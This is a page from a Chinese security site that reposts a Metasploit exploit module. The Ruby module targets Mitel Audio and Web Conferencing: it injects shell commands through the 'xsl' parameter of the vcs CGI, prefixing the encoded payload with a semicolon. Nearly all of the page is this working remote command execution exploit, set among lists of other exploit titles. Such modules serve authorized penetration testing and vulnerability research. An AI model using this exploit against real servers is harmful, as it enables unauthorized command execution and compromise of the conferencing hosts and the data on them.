首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Mitel Audio and Web Conferencing Command Injection
来源:http://www.metasploit.com 作者:hdm 发布时间:2010-12-24  
##
# $Id: mitel_awc_exec.rb 11389 2010-12-21 19:16:18Z swtornio $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Mitel Audio and Web Conferencing Command Injection',
			'Description'    => %q{
					This module exploits a command injection flaw within the Mitel
				Audio and Web Conferencing web interface. 
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 11389 
, 'References' => [ ['URL', 'http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr10-14'], ['OSVDB', '69934'], # ['CVE', ''], # ['BID', ''] ], 'Platform' => ['unix', 'linux'], 'Arch' => ARCH_CMD, 'Privileged' => false, 'Payload' => { 'DisableNops' => true, 'Space' => 1024, 'BadChars' => "<>", 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic perl ruby bash telnet', } }, 'Targets' => [ ['Automatic', { }], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Dec 12 2010' )) register_options( [ Opt::RPORT(80), OptString.new('URIPATH', [ true, "The path to the vcs cgi-bin binary", "/awcuser/cgi-bin/vcs" ]) ], self.class) end def exploit print_status("Attempting to execute our command..") res = send_request_cgi( { 'uri' => datastore['URIPATH'], 'method' => 'GET', 'vars_get' => { 'xml' => 'withXsl', 'xsl' => ';' + payload.encoded } }, 10) if res and res.code.to_i > 200 print_error("Unexpected reply: #{res.code} #{res.body[0,500].inspect}...") return end handler end end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft WMI Administration T
·DorsaCms SQL Injection Vulnera
·WMITools ActiveX Remote Comman
·HttpBlitz Web Server Denial Of
·Citrix Access Gateway Command
·Kolibri v2.0 Buffer Overflow R
·Apple iPhone Safari (JS .) Rem
·Windows 7 IIS7.5 FTPSVC UNAUTH
·Apple iPhone Safari (decodeURI
·Linux Kernel < 2.6.36-rc1 CAN
·Internet Explorer CSS Recursiv
·Redmine SCM Repository Arbitra
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved